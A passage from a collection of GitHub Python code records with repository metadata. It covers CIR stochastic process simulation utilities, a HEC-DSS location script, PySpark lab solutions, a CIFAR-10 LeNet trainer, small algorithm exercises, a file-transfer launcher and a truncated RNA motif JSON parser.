sm\nfrom scipy.stats import ncx2\nfrom scipy.stats import probplot\n\n\nclass MatlabRandn:\n\n def __init__(self):\n script_dir = os.path.dirname(os.path.realpath(__file__))\n self._randn = np.load(os.path.join(script_dir, \"../randn/randn.npy\"))\n self._index = 0\n\n def __call__(self, sz1, sz2=None):\n if sz2 is None:\n start = self._index\n end = self._index + sz1\n self._index = end\n return self._randn[start:end]\n else:\n start = self._index\n end = self._index + (sz1 * sz2)\n self._index = end\n return self._randn[start:end].reshape(sz2, sz1).T\n\n def reset(self):\n self._index = 0\n\n\ndef mc_mean(a, ci_width=0.95, axis=None):\n if axis is None:\n a = a.flatten()\n mc_mean = np.mean(a, axis=axis)\n quantile = scipy.stats.norm.ppf(1-(1-ci_width)/2)\n upper = mc_mean + quantile*np.std(a, axis=axis)/np.sqrt(a.shape[axis])\n lower = mc_mean - quantile*np.std(a, axis=axis)/np.sqrt(a.shape[axis])\n return mc_mean, lower, upper\n\n\ndef brownian_paths(T, N, M):\n dt = T/N\n dW = np.zeros((N+1, M))\n dW[1:,:] = np.random.normal(0, np.sqrt(dt), size=(N, M))\n W = np.cumsum(dW, axis=0) \n t = np.linspace(0, T, N+1)\n return t, W\n\n\ndef estimate_Sn(k, lamda, theta, X_0, scheme, T, n, M):\n t, W = brownian_paths(T, 2*n, M)\n t_n, X_n = scheme(k=k, lamda=lamda, theta=theta, 
X_0=X_0, t=t[::2], W=W[::2,:])\n t_2n, X_2n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t, W=W)\n S_n = np.mean(np.amax(np.abs(X_n - X_2n[::2,:]), axis=0))\n return S_n\n\n\ndef estimate_order(k, lamda, theta, X_0, scheme, T, n, M):\n t, W = brownian_paths(T, 2*n, M)\n t_n, X_n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t[::2], W=W[::2,:])\n t_2n, X_2n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t, W=W)\n S_n = np.mean(np.amax(np.abs(X_n - X_2n[::2,:]), axis=0))\n\n t_10, W_10 = brownian_paths(T, 20*n, M)\n t_10n, X_10n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t_10[::2], W=W_10[::2,:])\n t_20n, X_20n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t_10, W=W_10)\n S_10n = np.mean(np.amax(np.abs(X_10n - X_20n[::2,:]), axis=0))\n return np.log10(S_n) - np.log10(S_10n) #, np.log10(S_n), np.log10(S_10n)\n\n\ndef plot_distribution(k, lamda, theta, X_0, scheme, T, N_set, M, legend=False):\n colors = cm.rainbow(np.linspace(0, 1, len(N_set)))[::-1]\n for i, n in enumerate(N_set):\n t, W = brownian_paths(T, int(n), M)\n t, X_sim = scheme(k, lamda, theta, X_0, t, W)\n\n x = np.linspace(0, 5, 100)\n kde_sim = gaussian_kde(X_sim[-1,:])\n plt.plot(x, kde_sim(x), color=colors[i], label=str(n))\n\n X_T = np.zeros(M)\n for i in range(M):\n _, X_dist = direct_simulation(k, lamda, theta, X_0, T, 1)\n X_T[i] = X_dist[1]\n \n kde_dist = gaussian_kde(X_T)\n\n plt.plot(x, kde_dist(x), \"--\", label=\"True\", color=\"black\", linewidth=2)\n if legend:\n plt.legend()\n\n\ndef cir_bond_price(k, lamda, theta, X_t, T):\n t = 0\n h = np.sqrt(k**2 + 2*theta**2)\n A = ((2*h*np.exp((k+h)*(T-t)/2))/(2*h+(k+h)*(np.exp((T-t)*h)-1)))**(2*k*lamda/theta**2)\n B = (2*(np.exp((T-t)*h)-1))/(2*h+(k+h)*(np.exp((T-t)*h)-1))\n return A*np.exp(-B*X_t)\n\n\ndef price_derivative(k, lamda, theta, X_0, T, N, M, payoff):\n t, W = brownian_paths(T, N, M)\n _, X = implicit_scheme(k, lamda, theta, X_0, t, W)\n X_int = np.sum(X, axis=0)*(T/N)\n val = np.exp(-X_int) * payoff(X[-1])\n mc_mean = np.mean(val)\n sd = np.std(val)\n return mc_mean, mc_mean - 1.96*sd/np.sqrt(M), mc_mean + 1.96*sd/np.sqrt(M)\n\n\ndef show_probplot(k, lamda, theta, X_0, T, simulated):\n c = (2*k)/((1-np.exp(-k*T))*theta**2)\n df = 4*k*lamda/theta**2\n nc = 2*c*X_0*np.exp(-k*T)\n rv = ncx2(df, nc, scale=1/(2*c))\n x, y = probplot(simulated, dist = rv, fit=False)\n plt.plot(x, y, \"bo\")\n plt.title(\"Probability Plot\")\n plt.xlabel(\"Theoretical quantiles\")\n plt.ylabel(\"Ordered Values\")\n x = np.linspace(min(x[0], y[0]), max(x[-1], y[-1]), 2)\n plt.plot(x, x, \"k--\")\n plt.gca().set_aspect(\"equal\")\n\n \ndef show_qqplot(k, lamda, theta, X_0, T, simulated):\n c = (2*k)/((1-np.exp(-k*T))*theta**2)\n df = 4*k*lamda/theta**2\n nc = 2*c*X_0*np.exp(-k*T)\n pp = sm.ProbPlot(simulated, ncx2, distargs=(df,nc), scale=1/(2*c))\n x = pp.theoretical_quantiles\n y = pp.sample_quantiles\n \n plt.plot(x, y, \"bo\")\n plt.title(\"Probability Plot\")\n plt.xlabel(\"Theoretical quantiles\")\n plt.ylabel(\"Sample quantiles\")\n x = np.linspace(min(x[0], y[0]), max(x[-1], y[-1]), 2)\n plt.plot(x, x, \"k--\")\n plt.gca().set_aspect(\"equal\")\n\n\ndef perform_kstest(k, lamda, theta, X_0, T, simulated):\n c = (2*k)/((1-np.exp(-k*T))*theta**2)\n df = 4*k*lamda/theta**2\n nc = 2*c*X_0*np.exp(-k*T)\n rv = ncx2(df, nc, scale=1/(2*c))\n\n cdf = lambda x: rv.cdf(x)\n return kstest(simulated, cdf=cdf)\n\n\ndef correlated_paths(T, N, M, cor):\n dt = T/N\n dW1 = np.zeros((N+1, M))\n dW2 = np.zeros((N+1, M))\n dW1[1:,:] = np.random.normal(0, np.sqrt(dt), 
size=(N, M))\n W1 = np.cumsum(dW1, axis=0) \n dW2[1:,:] = cor * dW1[1:,:] + np.random.normal(0, np.sqrt(dt), size=(N, M)) * np.sqrt(1-cor**2)\n W2 = np.cumsum(dW2, axis=0) \n\n t = np.linspace(0, T, N+1)\n return t, W1, W2","repo_name":"tao-yu/cox-ingersoll-ross","sub_path":"sim/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9881584202","text":"#from hec.script import Plot\nfrom hec.heclib.dss import HecDss, DSSPathname\nimport csv\n \nclass csvfile:\n\n def __init__(self, filename):\n raw=list(csv.reader(open(filename)))\n self.column_names =raw[0] \n self.data = raw[1:]\n print(self.column_names)\n # print(self.data)\n\n def getString(self,rowIndex,column_name):\n colIndex = self.column_names.index(column_name)\n print(colIndex, column_name, pathname)\n return self.data[rowIndex][colIndex]\n\n def getFloat(self,rowIndex,column_name):\n s = self.getString(rowIndex,column_name)\n return float(s)\n\n def getInt(self,rowIndex,column_name):\n s = self.getString(rowIndex,column_name)\n return int(s)\n\n def size(self):\n return len(self.data)\n\n# begin main program\n# note: location info can be created when saving a specific timeseriescontainer\n# however, location info can't be modified as part of a timeseries container\n# because that location info is potentially shared with other containers\n\ncsv = csvfile(r\"D:/temp/DSS_SupInfo_location.csv\")\nfn =r\"C:/ProgramFiles/HEC/CWMS/CWMS_v3.2.3/CWMS-v3.2.3/common/grid/Chile/Chile_America_Santiago_SI.dss\"\ndss = HecDss.open(fn)\n\nfor i in range(0,csv.size()):\n pathname = csv.getString(i,\"\\xef\\xbb\\xbfpathname\")\n # print(pathname)\n dssPath = DSSPathname(pathname)\n dssPath.setDPart(\"\") # remove dates from pathname\n tsc=dss.get(dssPath.pathname())\n\n tsc.setLatLong(csv.getFloat(i,\"y\"),csv.getFloat(i,\"x\"))\n\n tsc.horizontalDatum = csv.getInt(i,\"xyDatum\")\n tsc.horizontalUnits = csv.getInt(i,\"xyUnits\")\n\n # tsc.setVerticalDatum(csv.getInt(i,\"zDatum\"))\n tsc.verticalDatum = csv.getInt(i,\"zDatum\")\n # tsc.setVerticalUnits(csv.getInt(i,\"zUnits\"))\n tsc.verticalUnits = csv.getInt(i,\"zUnits\")\n\n tsc.coordinateSystem = csv.getInt(i,\"coordSys\")\n tsc.coordinateID = csv.getInt(i,\"coordID\")\n\n tsc.locationTimezone = csv.getString(i,\"timeZone\")\n \n\n dss.put(tsc)\n print('\\n')\n\nprint('\\nDone!\\n')","repo_name":"HydrologicEngineeringCenter/DSSVue-Example-Scripts","sub_path":"src/locationInfo/DSS_SupInfo_set-location-info_expanded.py","file_name":"DSS_SupInfo_set-location-info_expanded.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"30799766636","text":"# solutions.py\n\nimport pyspark\nfrom pyspark.sql import SparkSession\nimport numpy as np\nimport numpy.linalg as la\nimport matplotlib.pyplot as plt\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.feature import VectorAssembler, StringIndexer, OneHotEncoder\nfrom pyspark.ml.tuning import ParamGridBuilder, TrainValidationSplit\nfrom pyspark.ml.classification import RandomForestClassifier\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator as MCE\n\n\n\n# --------------------- Resilient Distributed Datasets --------------------- #\n\n### Problem 1\ndef word_count(filename='huck_finn.txt'):\n \"\"\"\n A function that counts the number of occurrences unique occurrences of each\n word. 
Sorts the words by count in descending order.\n Parameters:\n filename (str): filename or path to a text file\n Returns:\n word_counts (list): list of (word, count) pairs for the 20 most used words\n \"\"\" \n #initialize SparkSession object:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #load file in as PySpark RDD:\n huck_finn = spark.sparkContext.textFile(\"huck_finn.txt\") \n \n #count number of occurences of each word:\n words = huck_finn.flatMap(lambda row: row.split()) #do flat map so that each word is on one row (its own row, one word per row) so that can count num of words easily\n #split gets each word by itself in a row\n words = words.map(lambda row: (row,1)) #mapping func applies a function to each row of our RDD, it makes it so we have a tuple of (word, 1)\n #do 1 because then can start counting the word at 1, call it on words bc want to do this with the split words\n \n words = words.reduceByKey(lambda x, y:x + y) #this looks @ RDD as a dict\n #if finds 2 keys that are the same: it will add the values together and increase the count of the word by 1 so this actually gets the word count\n \n #sort words by descending order:\n answer = list(words.sortBy(lambda row: -1*row[1]).collect()[:20]) #sort words in descending order and get the 1st 20 words, convert it to list\n \n spark.stop() #need to end the spark session\n \n return answer\n \n### Problem 2\ndef monte_carlo(n=10**5, parts=6):\n \"\"\"\n Runs a Monte Carlo simulation to estimate the value of pi.\n Parameters:\n n (int): number of sample points per partition\n parts (int): number of partitions\n Returns:\n pi_est (float): estimated value of pi\n \"\"\"\n #first need to initialize SparkSession object:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #create RDD w/ n*parts parameter amount of sample pts and partition it with parts parameter:\n #need to sample uniformly: np.random.random lets us sample from 0 to 1\n #multiplying it by 2 stretches the intervalto [0,2] so subtract off 1 to shift it to left 1 and be on interval [-1,1] like want to w/ uniform distrib.\n #the tuple w/ n*parts, 2 says have n*parts number of rows and the 2 creates a tuple like (x,y) pts\n samp_pts = spark.sparkContext.parallelize(2 * np.random.random((n*parts, 2)) - 1, parts) #Jake Murphy from state farm expained this to me, thanks Jake!\n \n #use .filter and a lambda function to check if points are inside unit circle or not (their sum is less than or equal to radius, which is 1 here)\n samp_pts = samp_pts.filter(lambda samp_pt: samp_pt[0]**2 + samp_pt[1]**2 <= 1) #sample_point[0] is x, sample_point[1] is y\n \n #calculate percentage of pts w/in circle\n perc_inside = samp_pts.count() / (n*parts) #.count returns num of elements in the RDD\n \n spark.stop() #need to end the spark session\n \n return perc_inside*4 #told in problem that multiplying perc of pts w/in circle by 4 gives us estimate for area of circle and thus estimate for pi\n \n# ------------------------------- DataFrames ------------------------------- #\n\n### Problem 3\ndef titanic_df(filename='titanic.csv'):\n \"\"\"\n Calculates some statistics from the titanic data.\n \n Returns: the number of women on-board, the number of men on-board,\n the survival rate of women, \n and the survival rate of men in that order.\n \"\"\"\n #initialize spark object first:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #load file into pyspark dataframe:\n titanic = 
spark.read.csv(filename)\n \n #find num of women on board:\n num_women = titanic.filter(titanic._c3 == \"female\").count() #column _c3 has sex of passengers so filter, count only by women \n \n #find num of men on board:\n num_men = titanic.filter(titanic._c3 == \"male\").count() #filter, count sex column by men\n \n #find survival rate of women:\n women_survived = titanic.filter(titanic._c0 == 1).filter(titanic._c3 == \"female\").count() #_c0 col says whether survivied or not: 1 means survived\n w_survivial_rate = women_survived / num_women \n \n #find survival rate of men:\n men_survived = titanic.filter(titanic._c0 == 1).filter(titanic._c3 == \"male\").count()\n m_survivial_rate = men_survived / num_men \n \n spark.stop() \n \n #return each 4 values in order given as tuple of floats:\n return ((num_women, num_men, w_survivial_rate, m_survivial_rate))\n \n### Problem 4\ndef crime_and_income(crimefile='london_crime_by_lsoa.csv',\n incomefile='london_income_by_borough.csv', major_cat='Robbery'):\n \"\"\"\n Explores crime by borough and income for the specified major_cat\n Parameters:\n crimefile (str): path to csv file containing crime dataset\n incomefile (str): path to csv file containing income dataset\n major_cat (str): major or general crime category to analyze\n returns:\n numpy array: borough names sorted by percent months with crime, descending\n \"\"\"\n #create spark object:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #load 2 files in as pyspark dataframes:\n crime_df = spark.read.csv(crimefile, header = True, inferSchema = True)\n income_df = spark.read.csv(incomefile, header = True, inferSchema = True)\n \n #only care about the crime specified in major_cat parameter so want to filter crime_df to only have that one crime in major_category column\n crime_df = crime_df.filter(crime_df.major_category == major_cat)\n \n #only want one row for each borough, but crime_df has multiple so need to use groupBy on it to fix this\n groups = crime_df.groupBy(\"borough\").sum(\"value\") #want to groupby boroughs, but want to get the total number of major_cat crimes that happened in each borough\n #value column counts how many of the crimes occured so sum over that column for each borough this gives us table\n #with 1 row for each borough and a column with the total major_cat crimes for each \n \n #now are able to join our 2 dataframes on the borough column (but be careful: want to join w/ groups now instead of crime_df)\n new_df = groups.join(income_df, on = \"borough\") #joining on borough will make it so that have 1 row for each borough\n new_df = new_df.drop(\"mean-08-16\") #get rid of this thing, no one wants it!\n \n #order by total num of crimes for major_cat, descending:\n new_df = new_df.orderBy(\"sum(value)\", ascending = False)\n \n new_df = new_df.withColumnRenamed(\"sum(value)\", \"major_cat_total_crime\") #rename the column name to more accurately represent what it is\n \n data_array = np.array(new_df.collect()) #convert dataframe to numpy array\n \n #create scatter plot of number of major_cat_crimes by median income for each borough\n plt.scatter(data_array[:,1].astype(float), data_array[:,2].astype(float), color = \"deeppink\")\n plt.xlabel(\"Number of major_cat Crimes\", color = \"mediumvioletred\")\n plt.ylabel(\"Median Income for Each Borough\", color = \"mediumvioletred\")\n plt.title(\"Number of major_cat Crimes By Median Income for Each Borough\", color = \"mediumvioletred\")\n plt.show()\n \n spark.stop()\n \n return 
data_array\n \n### Problem 5\ndef titanic_classifier(filename='titanic.csv'):\n \"\"\"\n Implements a classifier model to predict who survived the Titanic.\n Parameters:\n filename (str): path to the dataset\n Returns:\n metrics (tuple): a tuple of metrics gauging the performance of the model\n ('accuracy', 'weightedRecall', 'weightedPrecision')\n \"\"\"\n #create spark object:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #load 2 files in as pyspark dataframes:\n schema = ('survived INT, pclass INT, name STRING, sex STRING, age FLOAT, sibsp INT, parch INT, fare FLOAT')\n titanic = spark.read.csv(filename, schema = schema)\n \n #use pyspark.ml package to train classifier: doing the same exact thing as the ex given above the problem but want to outperform LogisticRegression so use RFClass instead is the only change make\n \n #prepare data by converting the 'sex' column to binary categorical variable\n sex_binary = StringIndexer(inputCol='sex', outputCol='sex_binary')\n \n onehot = OneHotEncoder(inputCols=['pclass'], outputCols=['pclass_onehot']) #one-hot-encode pclass (Spark automatically drops a column)\n \n features = ['sex_binary', 'pclass_onehot', 'age', 'sibsp', 'parch', 'fare'] #create single features column\n features_col = VectorAssembler(inputCols=features, outputCol='features')\n \n #now we create a transformation pipeline to apply the operations above\n #this is very similar to the pipeline ecosystem in sklearn\n pipeline = Pipeline(stages=[sex_binary, onehot, features_col])\n titanic = pipeline.fit(titanic).transform(titanic)\n \n titanic = titanic.drop('pclass', 'name', 'sex') #drop unnecessary columns for cleaner display (note the new columns)\n \n train, test = titanic.randomSplit([0.75, 0.25], seed=11) #split into train/test sets (75/25)\n \n #now do RandomForestClassification instead of LogisiticRegression:\n rf = RandomForestClassifier(labelCol='survived', featuresCol='features')\n \n #run a train-validation-split to fit best elastic net param\n #ParamGridBuilder constructs a grid of parameters to search over\n #have different hyperparameters for RF than for LR so this is another change that need to make too\n paramGrid = ParamGridBuilder()\\\n .addGrid(rf.maxBins, [5, 3, 12]).build()\n \n #TrainValidationSplit will try all combinations and determine best model using the evaluator (see also CrossValidator)\n tvs = TrainValidationSplit(estimator=rf,\n estimatorParamMaps=paramGrid,\n evaluator=MCE(labelCol='survived'),\n trainRatio=0.75,\n seed=11)\n \n #train the classifier by fitting our tvs object to the training data\n clf = tvs.fit(train)\n \n #use the best fit model to evaluate the test data\n results = clf.bestModel.evaluate(test)\n \n accuracy = results.accuracy\n weightedRecall = results.weightedRecall\n weightedPrecision = results.weightedPrecision\n \n spark.stop()\n \n return ((accuracy, weightedRecall, weightedPrecision))\n \n #Jake Murphy pulled me through this lab. 
Big props to him\n \nif __name__ == '__main__':\n \n #test prob 1:\n #print(word_count(filename='huck_finn.txt'))\n \n #test prob 2:\n #print(monte_carlo(n=10**5, parts=6))\n \n #test prob 3:\n #print(titanic_df(filename = 'titanic.csv'))\n \n #test prob 4:\n #print(crime_and_income(crimefile='london_crime_by_lsoa.csv', incomefile='london_income_by_borough.csv', major_cat='Robbery'))\n \n #test prob 5:\n #print(titanic_classifier(filename='titanic.csv'))\n \n pass\n","repo_name":"janeslagle/ACME-Senior-Year-Labs","sub_path":"spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":12314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29851197231","text":"n=int(input())\nif n<0:\n q=-n\nelse:\n q=n\ns=[int(i) for i in str(q)]\nfor i in range(len(s)):\n if s[-1]==0:\n s.remove(0)\nm=s[::-1]\nk=''.join([str(i) for i in m])\nif n>0:\n print(int(k))\nelse:\n print(-int(k))","repo_name":"kalyankol/codemind-python","sub_path":"Reverse_Integer.py","file_name":"Reverse_Integer.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70933939321","text":"# @Author: Administrator\n# @Date: 2019-09-09 13:40:28\n# @Last Modified by: Administrator\n# @Last Modified time: 2019-09-10 22:20:48\n\n# -*- coding: utf-8 -*-\n\n# 先将cifar-10数据集转成train和test\n\nimport pickle as p\nimport numpy as np\nimport os\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nroot_path = 'd:/_python/神经网络数据集/CIFAR-10'\nos.chdir(root_path)\n\n# 原来的tensor是三个维度的,值在0到1之间,那么经过transforms.Normalize之后就到了-1到1区间\n# x = (x-mean)/std 也就是((0,1)-0.5)/0.5=(-1,1)\ntransform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n\n# 在构建数据集的时候指定transform,就会应用我们定义好的transform\n# root是存储数据的文件夹,download=True指定如果数据不存在先下载数据\ncifar_train = torchvision.datasets.CIFAR10(root='./', train=True,\n download=False, transform=transform)\ncifar_test = torchvision.datasets.CIFAR10(root='./', train=False,\n download=False,transform=transform)\n\n# 读取 trian 和 test 数据\ntrainloader = torch.utils.data.DataLoader(cifar_train, batch_size=32, shuffle=True)\ntestloader = torch.utils.data.DataLoader(cifar_test, batch_size=32, shuffle=True)\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n# 定义神经网络\nclass LeNet(nn.Module):\n # 一般在__init__中定义网络需要的操作算子,比如卷积、全连接算子等等\n def __init__(self):\n # 这个语句是找到LeNet的父类即nn.Module,然后执行nn.Module的init方法\n # 相当于对实例LeNet执行nn.Module进行初始化方法\n super(LeNet, self).__init__()\n # Conv2d的第一个参数是输入的channel数量,第二个是输出的channel数量,第三个是kernel size\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.conv2 = nn.Conv2d(6, 16, 5)\n # 由于上一层有16个channel输出,每个feature map大小为5*5,所以全连接层的输入是16*5*5\n self.fc1 = nn.Linear(16*5*5, 120)\n self.fc2 = nn.Linear(120, 84)\n # 最终有10类,所以最后一个全连接层输出数量是10\n self.fc3 = nn.Linear(84, 10)\n self.pool = nn.MaxPool2d(2, 2)\n # forward这个函数定义了前向传播的运算,只需要像写普通的python算数运算那样就可以了\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = self.pool(x)\n x = F.relu(self.conv2(x))\n x = self.pool(x)\n # 下面这步把二维特征图变为一维,这样全连接层才能处理\n x = x.view(-1, 16*5*5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n# 实例化神经网络\nnet = LeNet()\n# 定义损失函数和优化器\n# optim中定义了各种各样的优化方法,包括SGD\nimport torch.optim as optim\n\n# CrossEntropyLoss就是我们需要的损失函数,optimizer就是优化器\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=0.001, 
momentum=0.9)\n\nprint(\"Start Training...\")\nfor epoch in range(30):\n # 我们用一个变量来记录每100个batch的平均loss\n loss100 = 0.0\n # 我们的dataloader派上了用场\n for i, data in enumerate(trainloader):\n inputs, labels = data\n # 首先要把梯度清零,不然PyTorch每次计算梯度会累加,不清零的话第二次算的梯度等于第一次加第二次的\n optimizer.zero_grad()\n # 计算前向传播的输出\n outputs = net(inputs)\n # 根据输出计算loss\n loss = criterion(outputs, labels)\n # 算完loss之后进行反向梯度传播,这个过程之后梯度会记录在变量中\n loss.backward()\n # 用计算的梯度对模型去做优化\n optimizer.step()\n loss100 += loss.item()\n if i % 100 == 99:\n print('[Epoch %d, Batch %5d] loss: %.3f' %\n (epoch + 1, i + 1, loss100 / 100))\n loss100 = 0.0\n\nprint(\"Done Training!\")\n\n\n# ok,训练完了之后我们来检测一下准确率,我们用训练好的模型来预测test数据集\n# 构造测试的dataloader\ndataiter = iter(testloader)\n# 预测正确的数量和总数量\ncorrect = 0\ntotal = 0\n# 使用torch.no_grad的话在前向传播中不记录梯度,节省内存\nwith torch.no_grad():\n for data in testloader:\n images, labels = data\n images, labels = images.to(device), labels.to(device)\n # 预测\n outputs = net(images)\n # 我们的网络输出的实际上是个概率分布,去最大概率的哪一项作为预测分类\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\nprint('Accuracy of the network on the 10000 test images: %d %%' % (\n 100 * correct / total))","repo_name":"fengmingshan/python","sub_path":"Pytroch_神经网络/pytroch_解决cifar-10图片分类问题.py","file_name":"pytroch_解决cifar-10图片分类问题.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"5463135303","text":"def lastStoneWeightII(self, stones):\n # stupid brain teaser: basically, you need to try all combinations...\n values = set([stones[0], -stones[0]])\n \n for x in stones[1:]:\n temp1 = {y+x for y in values}\n temp2 = {y-x for y in values}\n temp1.update(temp2)\n values = temp1\n \n return min([x for x in values if x >= 0])\n","repo_name":"bigw660/Algorithm-Practice","sub_path":"1049. Last Stone Weight II.py","file_name":"1049. Last Stone Weight II.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"41478025525","text":"import os\nimport sys\nimport pandas as pd\nfrom configs.main_config import config\n\n\ndef ensemble(config):\n experiment_path = os.path.join(config[\"experiment_folder\"])\n if not os.path.exists(experiment_path):\n sys.exit(\n \"Path {} does not exist. 
Please run prepare_data.py and dissect.py before.\".format(\n experiment_path\n )\n )\n\n i = 0\n for i in range(len(config[\"models\"])):\n df_curr = pd.read_table(\n os.path.join(\n config[\"experiment_folder\"], \"dissect_fractions_{}.txt\".format(i)\n ),\n index_col=0,\n )\n if i == 0:\n df_ens = df_curr\n else:\n df_ens = df_ens + df_curr\n df_ens = df_ens / len(config[\"models\"])\n savepath = os.path.join(config[\"experiment_folder\"], \"dissect_fractions_ens.txt\")\n print(\"Ensemble predictions are saved to {}\".format(savepath))\n df_ens.to_csv(savepath, sep=\"\\t\")\n\n\nif __name__ == \"__main__\":\n ensemble(config)\n","repo_name":"robinredX/DISSECT","sub_path":"ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24714983799","text":"class Node:\r\n def __init__(self,val=0,next=None):\r\n self.val=val\r\n self.next=next\r\n\r\nclass MyLinkedList:\r\n\r\n def __init__(self):\r\n self.head=None\r\n self.length=0\r\n def get(self, index: int) -> int:\r\n if index<0 or index>self.length-1:\r\n return -1\r\n else:\r\n node=self.head\r\n if node:\r\n for i in range(index):\r\n node=node.next\r\n return node.val\r\n else:\r\n return -1\r\n def addAtHead(self, val: int) -> None:\r\n cur=Node(val,self.head)\r\n self.head=cur\r\n self.length+=1\r\n def addAtTail(self, val: int) -> None:\r\n cur=Node(val)\r\n node=self.head\r\n if node:\r\n for i in range(self.length-1):\r\n node=node.next\r\n node.next=cur\r\n else:\r\n self.head=cur\r\n self.length+=1\r\n def addAtIndex(self, index: int, val: int) -> None:\r\n cur=Node(val)\r\n if index<0 or index>self.length:\r\n return\r\n elif index==0:\r\n self.addAtHead(val)\r\n else:\r\n node=self.head\r\n if node:\r\n for i in range(index-1):\r\n node=node.next\r\n cur.next=node.next\r\n node.next=cur\r\n else:\r\n return\r\n self.length+=1\r\n def deleteAtIndex(self, index: int) -> None:\r\n if index<0 or index>self.length-1:\r\n return\r\n elif index==0:\r\n self.head=self.head.next\r\n else:\r\n node=self.head\r\n if node:\r\n for i in range(index-1):\r\n node=node.next\r\n node.next=node.next.next\r\n else:\r\n return\r\n self.length-=1\r\n# Your MyLinkedList object will be instantiated and called as such:\r\n# obj = MyLinkedList()\r\n# param_1 = obj.get(index)\r\n# obj.addAtHead(val)\r\n# obj.addAtTail(val)\r\n# obj.addAtIndex(index,val)\r\n# obj.deleteAtIndex(index)","repo_name":"kartikeya-arun/codes","sub_path":"Python/leetcode/design-linked-list.py","file_name":"design-linked-list.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19036638590","text":"import socket,os,sys\nfrom send import transfer\nfrom receive import receive\nimport gui\ndef main():\n args = sys.argv\n #print(sys.argv)\n path = os.path.dirname(sys.argv[0])\n #print(path)\n if len(args) == 1:\n main = gui.main()\n main.mainloop()\n elif len(args) == 2:\n if args[1].lower()==\"receive\":\n receive(path)\n else:\n transfer(args[1],path)\n else:\n if args[1].lower()==\"raw\":\n transfer(\" \".join(args[2:]),path,raw=True)\n else:\n print(\"Received too many or too few arguments...\")\n #input(\"Press 'Enter' to exit...\\n\")\n\nif __name__==\"__main__\":\n 
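# usage: no args opens the GUI; 'receive' waits for an incoming file; a file path sends that file; 'raw <text...>' sends the remaining words as raw text\n    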
main()\n","repo_name":"ClackHack/WifiTransfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25179073354","text":"import json\r\nimport sys\r\ndata = []\r\nlongdict={}\r\nseqdict={}\r\niddict={}\r\nnumdict={}\r\nwith open(sys.argv[1]) as json_file: #Datei wird dem Programm als Commandline Argument übergeben.\r\n data = json.load(json_file) #Laden des JSON Files und erstellen von später verwendeten Dictionaries sowie Abspeicherung des JSON Files in \"data\" als Liste\r\n\r\n #Erstellen des Longdict welches als Key die ID der Sequenz und als Values die Informationseinträge dafür enthält\r\nfor i in range(len(data)):\r\n for element in data[i][\"alignment\"]:\r\n temp=[]\r\n for long in data[i][\"alignment\"][element]:\r\n temp.append (long)\r\n longdict[element]=temp\r\n#Erstellen des Seqdict mit den Sequenz IDs als Keys und den dazugehörigen Sequenzen\r\nfor element in longdict:\r\n x=element\r\n y=longdict[element]\r\n temp2=[]\r\n for element in y:\r\n temp=[]\r\n a = element.split(\"|\")\r\n for idx, val in enumerate(a):\r\n if idx == 3:\r\n temp2.append(val)\r\n temp2=\"\".join(temp2)\r\n seqdict[x]=temp2\r\n#Erstellen des Numdict mit den Sequenz IDs als Keys und den dazugehörigen Basenpaarpositionen in ihrer RNA\r\nfor element in longdict:\r\n x=element\r\n y=longdict[element]\r\n temp2=[]\r\n for element in y:\r\n temp=[]\r\n a = element.split(\"|\")\r\n for idx, val in enumerate(a):\r\n if idx == 4:\r\n temp2.append(val)\r\n numdict[x]=temp2\r\n#Erstellen des iddicts mit den Motif IDs als Keys und den Alignment Loop IDs als Values\r\nfor i in range(len(data)):\r\n alignment_keys=[]\r\n alignment_keys=list(data[i][\"alignment\"].keys())\r\n iddict[data[i][\"motif_id\"]]=alignment_keys\r\n#Loopf ID Eingabe als try/except Schleife\r\ntry:\r\n Eingabe = sys.argv[2]\r\n for value in 